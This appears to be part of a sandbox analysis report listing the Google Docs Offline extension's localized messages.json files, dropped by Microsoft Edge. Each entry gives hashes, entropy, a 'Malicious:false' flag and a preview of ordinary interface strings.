                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1285
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                                                                        MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                                                                        SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                                                                        SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                                                                        SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1244
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                                                                        MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                                                                        SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                                                                        SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                                                                        SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):977
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                                                                        MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                                                                        SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                                                                        SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                                                                        SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3107
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                                                                        MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                                                                        SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                                                                        SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                                                                        SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1389
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                                                                        MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                                                                        SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                                                                        SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                                                                        SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1763
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                                                                        MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                                                                        SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                                                                        SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                                                                        SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):930
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                                                                        MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                                                                        SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                                                                        SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                                                                        SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):913
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                                                                        MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                                                                        SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                                                                        SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                                                                        SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):806
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                                                                        MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                                                                        SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                                                                        SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                                                                        SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):883
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                                                                        MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                                                                        SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                                                                        SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                                                                        SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1031
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                                                                        MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                                                                        SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                                                                        SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                                                                        SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1613
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                                                                        MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                                                                        SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                                                                        SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                                                                        SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):851
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
